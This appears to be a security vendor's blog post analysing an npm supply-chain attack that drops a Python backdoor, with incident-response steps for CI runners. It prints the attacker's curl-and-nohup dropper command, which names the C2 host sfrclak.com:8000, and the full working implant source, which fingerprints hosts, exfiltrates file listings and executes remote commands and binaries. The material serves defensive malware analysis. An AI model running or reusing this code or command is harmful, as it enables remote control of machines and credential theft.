From Nodes to Snakes: NPM Supply Chain Attack
After a long week at RSA and several supply chain attacks, our researchers and MDR team highlighted a supply chain attack delivered through npm that leads to the execution of a Python-based payload on infected machines. At a high level, the malware fingerprints the host, collects basic system and user environment data, and then communicates with attacker-controlled infrastructure to receive follow-on instructions. Rather than acting noisily, it appears designed to understand the system first, helping the attacker focus on valuable targets while reducing the chance of early detection. We uncovered the activity using our eBPF-based sensor, which gave us runtime visibility into the full behavior chain from the initial process execution and file activity to the outbound network communication, allowing us to connect the suspicious package activity to the later-stage malicious behavior in a clear, high-confidence way.
Attack drill down
We identified this attack on March 30, 2026 around 5:00 PM PST during active investigation. We have found an indication of a supply chain based on NPM that leads to the execution of a unique Python script. The attacker downloads a Python from the following URL packages.npm.org/product2 that downloads a Python script ld.py, the code inside takes artifacts from the operating system, then builds a unique signature and only then gets the second stage of the attack. This technique tries to avoid scanners that are looking for a direct second stager from http://sfrclak.com:8000/6202033.
The main code block

The attacker has both options for windows and linux, first the attacker generates a unique id for the compromised machine and gets called to a function that detects the OS type by arch of the CPU.
After that he collects the users home dir and looks for the files shown below and crawls all the files.

After finishing the first build of request the attackers ship the data encoded in base64 to his url with a unique path, the url is communicated by port 8000 and only after that we reach to the good part of main_work!
First the attacker gathers metadata about the host he compromised

After that the attacker goes into an endless loop and gets to the job.
The attacker uses direct access to Linux OS assets bypassing the OS commands and getting the files instead of the CLI command to bypass the defense.
In the following payload the attacker prints the process tree but does more than that, but if it has high privileges it will try to get the process data and get the user names from the /etc/passwd.
The attacker creates the ability to monitor the process tree while he possess all the sensitive information that he gathered in the first part of the script, we believe the attacker watches the machines he infected and will sometime use the cred he stole to posses the host.

Detection:

Immediate Actions:
Step 1 – Kill the Python script
SSH into each CI runner and run:
bash
ps aux | grep "ld.py"
kill -9Copied
Step 2 – Block the C2 server
The malware beacons to sfrclak.com:8000 every 60 seconds and receives commands from it. Block immediately at your firewall or WAF:
Domain: sfrclak.com
Port: 8000 outboundCopied
Step 3 – Rotate These Credentials Now
The malware crawled ~/.config, ~/Documents, and ~/Desktop on its very first run and sent a full file inventory to the attacker. They know exactly what credentials exist on your runner. Assume all of the following are compromised:
- CI/CD secret variables and environment variables
- SSH keys on or used by the runner
- Cloud provider keys (AWS, GCP, Azure)
- Git hosting tokens (GitHub/GitLab PATs)
- Container registry credentials
- Any API keys in ~/.config or ~/Documents
Rotate every one of these. The attacker has had the ability to request the actual file contents at any time via remote command since the malware first ran.
Step 4 – Audit for Lateral Movement
The malware read /etc/passwd and sent the full user list to the attacker. Check whether any of those accounts were used abnormally:
# Check recent logins across all users
last -n 50
# Look for unusual sudo usage
grep "sudo" /var/log/auth.log | tail -50
# Check for new SSH keys added to any user
find /home /root -name "authorized_keys" -newer /tmp/ld.py 2>/dev/nullCopied
Step 5 – Take Runners Offline
Remove affected runners from your pool immediately. Do not wipe them – preserve for forensics, we highly recommend holding back version release until clearing the environment.
/bin/sh -c curl -o /tmp/ld.py -d packages.npm.org/product2 -s http://sfrclak.com:8000/6202033 && nohup python3 /tmp/ld.py http://sfrclak.com:8000/6202033 > /dev/null 2>&1 &Copied
Malicious Python Script Sample
import string
import secrets
import os
import pwd
import platform
import time
import sys
import subprocess
import base64
import shlex
from pathlib import Path
import json
from urllib.parse import urlsplit
import datetime
import http.client
import sys
def get_os():
arch = platform.machine().lower()
if arch in ("x86_64", "amd64"):
return "linux_x64"
elif "arm" in arch or "aarch" in arch:
return "linux_arm"
else:
return "linux_unknown"
def get_boot_time():
with open("/proc/uptime", "r") as f:
uptime_seconds = float(f.readline().split()[0])
boot_time = datetime.datetime.now() - datetime.timedelta(seconds=uptime_seconds)
return boot_time
def get_host_name():
with open("/proc/sys/kernel/hostname", "r") as f:
return f.read().strip()
def get_user_name():
return os.getlogin()
def get_installation_time():
install_log_path = "/var/log/installer"
dpkg_log_path = "/var/log/dpkg.log"
if os.path.exists(install_log_path):
install_time = os.path.getctime(install_log_path)
elif os.path.exists(dpkg_log_path):
install_time = os.path.getctime(dpkg_log_path)
else:
return ""
return datetime.datetime.fromtimestamp(install_time)
def get_system_info():
manufacturer = ""
product_name = ""
try:
with open("/sys/class/dmi/id/sys_vendor", "r") as f:
manufacturer = f.read().strip()
except FileNotFoundError:
pass
try:
with open("/sys/class/dmi/id/product_name", "r") as f:
product_name = f.read().strip()
except FileNotFoundError:
pass
return manufacturer, product_name
def get_process_list():
process_list = []
current_pid = os.getpid()
for pid in os.listdir("/proc"):
if pid.isdigit():
try:
cmdline_path = os.path.join("/proc", pid, "cmdline")
if os.path.exists(cmdline_path):
with open(cmdline_path, "r") as cmdline_file:
cmdline = cmdline_file.read().replace("\x00", " ").strip()
else:
cmdline = "N/A"
with open(os.path.join("/proc", pid, "stat"), "r") as stat_file:
stat_content = stat_file.read().split()
ppid = int(stat_content[3])
start_time_ticks = int(stat_content[21])
with open("/proc/uptime", "r") as uptime_file:
uptime_seconds = float(uptime_file.readline().split()[0])
system_boot_time = datetime.datetime.now() - datetime.timedelta(
seconds=uptime_seconds
)
start_time = system_boot_time + datetime.timedelta(
seconds=start_time_ticks
/ os.sysconf(os.sysconf_names["SC_CLK_TCK"])
)
with open(os.path.join("/proc", pid, "status"), "r") as status_file:
for line in status_file:
if line.startswith("Uid:"):
uid = int(line.split()[1])
break
else:
uid = -1
username = "N/A"
if uid != -1:
with open("/etc/passwd", "r") as passwd_file:
for passwd_line in passwd_file:
fields = passwd_line.strip().split(":")
if int(fields[2]) == uid:
username = fields[0]
break
if int(pid) == current_pid:
process_list.append(
(int(pid), ppid, username, start_time, "*" + cmdline)
)
else:
process_list.append((int(pid), ppid, username, start_time, cmdline))
except (FileNotFoundError, IndexError, ValueError):
pass
return process_list
def print_process_list():
process_list = get_process_list()
str = ""
for pid, ppid, username, start_time, cmdline in process_list:
if len(cmdline) > 60:
cmdline = cmdline[:57] + "..."
start_time_str = start_time.strftime("%Y-%m-%d %H:%M:%S")
str += (
"{:<10} {:<10} {:<15} {:<25} {:<}".format(
pid, ppid, username, start_time_str, cmdline
)
+ "\n"
)
str += "\n"
return str
def generate_random_string(length):
characters = string.ascii_letters + string.digits
return "".join(secrets.choice(characters) for _ in range(length))
def do_action_ijt(ijtbin, param):
payload = base64.b64decode(b64_string)
file_path = f"/tmp/.{generate_random_string(6)}"
try:
with open(file_path, "wb") as file:
file.write(payload)
os.chmod(file_path, 0o777)
subprocess.Popen(
[file_path] + shlex.split(param.decode("utf-8", errors="strict"))
)
except Exception as e:
return {
"status": "Zzz",
"msg": str(e)
}
return {
"status": "Wow",
"msg": ""
}
def get_filelist(PathStr, id, Recurse=False):
p = Path(PathStr)
if not p.exists():
raise Exception(f"No Exists Such Dir: {PathStr}")
items = p.rglob("*") if Recurse else p.iterdir()
result = []
for item in items:
stat = item.stat()
created_ts = getattr(stat, "st_birthtime", None)
created = int(created_ts) if created_ts is not None else 0
modified = int(stat.st_mtime)
hasItems = False
if item.is_dir():
hasItems = any(item.iterdir())
result.append({
"Name": item.name,
"IsDir": item.is_dir(),
"SizeBytes": 0 if item.is_dir() else stat.st_size,
"Created": created,
"Modified": modified,
"HasItems": hasItems
})
return {
"id": id,
"parent": str(p),
"childs": result
}
def do_action_dir(Paths):
rlt = []
for item in Paths:
rlt.append(get_filelist(item["path"], item["id"]))
return rlt
def init_dir_info():
home_dir = Path.home()
init_dir = [
home_dir,
home_dir / ".config",
home_dir / "Documents",
home_dir / "Desktop",
]
rlt = []
idx = 0
for item in init_dir:
if item.exists():
rlt.append(get_filelist(str(item), "FirstReqPath-" + str(idx)))
idx = idx + 1
return rlt
def do_run_scpt(cmdline):
try:
result = subprocess.run(
cmdline,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
text=True
)
return {
"status": "Wow",
"msg": result.stdout
}
except Exception as e:
return {
"status": "Zzz",
"msg": str(e)
}
def do_action_scpt(scpt, param):
if not scpt:
return do_run_scpt(param)
try:
payload = base64.b64decode(scpt).decode("utf-8", errors="strict")
result = subprocess.run(
["python3", "-c", payload] + shlex.split(param),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
text=True
)
return {
"status": "Wow",
"msg": result.stdout
}
except Exception as e:
return {
"status": "Zzz",
"msg": str(e)
}
def send_post_request(full_url, data):
try:
url_parts = urlsplit(full_url)
host = url_parts.netloc
path = url_parts.path or "/"
if url_parts.query:
path += "?" + url_parts.query
if isinstance(data, str):
data = data.encode("utf-8")
if url_parts.scheme == "https":
conn = http.client.HTTPSConnection(host, timeout=60)
else:
conn = http.client.HTTPConnection(host, timeout=60)
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)",
}
conn.request("POST", path, data, headers)
response = conn.getresponse()
response_data = response.read()
conn.close()
return response_data
except Exception:
return None
def send_result(url, body):
encoded = base64.b64encode(
json.dumps(body, ensure_ascii=False).encode("utf-8")
).decode()
return send_post_request(url, encoded)
def process_request(url, uid, data) -> bool:
if len(data) == 0:
return False
json_obj = json.loads(data)
if json_obj.get("type") == "kill":
body = {
"type": "CmdResult",
"cmd": "rsp_kill",
"cmdid": json_obj.get("CmdID"),
"uid": uid,
"status": "success",
}
send_result(url, body)
sys.exit(0)
elif json_obj.get("type") == "peinject":
rlt = do_action_ijt(
json_obj.get("IjtBin"),
json_obj.get("Param")
)
body = {
"type": "CmdResult",
"cmd": "rsp_peinject",
"cmdid": json_obj.get("CmdID"),
"uid": uid,
"status": rlt.get("status"),
"msg": rlt.get("msg"),
}
send_result(url, body)
elif json_obj.get("type") == "runscript":
rlt = do_action_scpt(
json_obj.get("Script"),
json_obj.get("Param")
)
body = {
"type": "CmdResult",
"cmd": "rsp_runscript",
"cmdid": json_obj.get("CmdID"),
"uid": uid,
"status": rlt.get("status"),
"msg": rlt.get("msg"),
}
send_result(url, body)
elif json_obj.get("type") == "rundir":
rlt = do_action_dir(json_obj.get("ReqPaths"))
body = {
"type": "CmdResult",
"cmd": "rsp_rundir",
"cmdid": json_obj.get("CmdID"),
"status": "Wow",
"uid": uid,
"msg": rlt,
}
send_result(url, body)
return True
def main_work(url, uid):
boot_time = str(get_boot_time())
installation_time = str(get_installation_time())
timezone = str(datetime.datetime.now(datetime.timezone.utc).astimezone().tzinfo)
manufacturer, product_name = get_system_info()
os_version = platform.system() + " " + platform.release() + " "
os = get_os()
while True:
current_time = str(datetime.datetime.now())
ps = print_process_list()
data = {
"hostname": get_host_name(),
"username": get_user_name(),
"os": os,
"version": os_version,
"timezone": timezone,
"installDate": installation_time,
"bootTimeString": boot_time,
"currentTimeString": current_time,
"modelName": manufacturer,
"cpuType": product_name,
"processList": ps
}
body = {
"type": "BaseInfo",
"uid": uid,
"data": data
}
response_content = send_result(url, body)
if response_content:
result = process_request(url, uid, response_content)
time.sleep(60)
def work():
url = sys.argv[1]
uid = generate_random_string(16)
os = get_os()
dir_info = init_dir_info()
body = {
"type": "FirstInfo",
"uid": uid,
"os": os,
"content": dir_info
}
send_result(url, body)
main_work(url, uid)
return True
work()Copied


